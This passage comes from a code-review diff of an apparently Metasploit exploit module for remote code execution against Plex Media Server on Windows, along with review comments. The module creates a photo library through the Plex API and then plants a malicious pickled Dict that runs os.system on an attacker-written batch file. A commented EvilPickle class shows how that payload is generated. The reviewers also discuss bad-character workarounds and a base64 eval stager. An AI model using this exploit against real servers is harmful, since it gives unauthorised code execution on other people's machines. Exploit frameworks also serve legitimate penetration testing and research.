modules/exploits/windows/http/plex_unpickle_dict_rce.rb

```diff
@@ -0,0 +1,280 @@
+        OptString.new('LIBRARY_PATH', [true, 'Path to write picture library to', 'C:\\Users\\Public']),
+        OptString.new('ALBUM_NAME', [true, 'Name of Album', '']),
+        OptInt.new('REBOOT_SLEEP', [true, 'Time to wait for Plex to restart', 15])
+      ]
+    )
+  end
+
+  def album_name
+    if @album_name.nil?
+      @album_name = datastore['ALBUM_NAME'].blank? ? rand_text_alphanumeric(6) : datastore['ALBUM_NAME']
+    end
+    @album_name
+  end
+
+  def create_photo_library
+    print_status('Adding new photo library')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/library/sections',
+      'headers' =>
+        {
+          'X-Plex-Token' => datastore['PLEX_TOKEN'],
+          'Accept' => 'application/json'
+        },
+      'vars_get' =>
+        {
+          'name' => album_name,
+          'language' => 'en',
+          'agent' => 'com.plexapp.agents.none',
+          'location' => datastore['LIBRARY_PATH'],
+          'type' => 'photo',
+          'scanner' => 'Plex Photo Scanner'
+        }
+    )
+    # response:
+    # {"MediaContainer":{"size":1,"Directory":[{"art":"/:/resources/photo-fanart.jpg","composite":"/library/sections/-1/composite/1592441414","thumb":"/:/resources/photo.png","key":"7","type":"photo","title":"EvilLib2","agent":"com.plexapp.agents.none","scanner":"Plex Photo Scanner","language":"en","uuid":"95d3810f-8be0-497c-b6d4-170050f7ab30","updatedAt":1592441414,"createdAt":1592441414,"enableAutoPhotoTags":false,"content":true,"directory":true,"contentChangedAt":5135637678740750690,"Location":[{"id":7,"path":"C:\\Users\\Public"}]}]}}
+    # we need to pull ['MediaContainer']['Directory'][0]['key']
+    if res && res.code == 201 # 201 == Created
+      return res.get_json_document['MediaContainer']['Directory'][0]['key']
+    end
+
+    nil
+  end
+
+  def add_pickle(location)
+    print_status('Adding pickled Dict to library')
+    # pickle dump of os.system of a path with Dict.bat at the end.  MUST BE GENERATED ON WINDOWS
+    # generating on *nix will use posix, and fail on target.
+    # the path is arbitrary as it gets replaced
+    # This method is fragile.  After reviewing several examples, and write-ups, I wasn't
+    # able to get this working with more than 1 function call, and any spaces.  Not sure
+    # if the problem is the pickling, unpickling, or plex.  POC didn't would work with a
+    # trailing space, but no 2nd option.  To circumvent all this, we write our payload to
+    # Dict.bat, and just call it directly.
+
+    #######
+    # python
+    #######
+    # import pickle
+    # import os
+    #
+    # class EvilPickle(object):
+    #  def __init__(self):
+    #    pass
+    #  def __reduce__(self):
+    #    return (os.system,('c:\\Users\\Public\\mememe\\Dict.bat',))
+    #
+    # e = EvilPickle()
+    # pickle.dumps(e)
+
+    p = "\x80\x02cnt\nsystem\nq\x00U\x1f#{datastore['LIBRARY_PATH']}\\#{album_name}\\Dict.batq\x01\x85q\x02Rq\x03."
```

Comment:
Did you try this with `eval` and using a Python stager/payload? I also think that `\x1f` right before the path string is the expected length of the string, so we would also want to calculate that at runtime.

Reply:
I did. it was extremely picky on bad characters, and encoding and the like.  I attempted to bypass that with a `eval(b64.decode` (pseudocode) as per @smcintyre-r7 's suggestion, but chaining functions also turned out to be problematic (also i never found an example that actually did it...)

I'll test out the `\x1f`, i had set the `album_name` to a specific length, so i never tested that, but will do so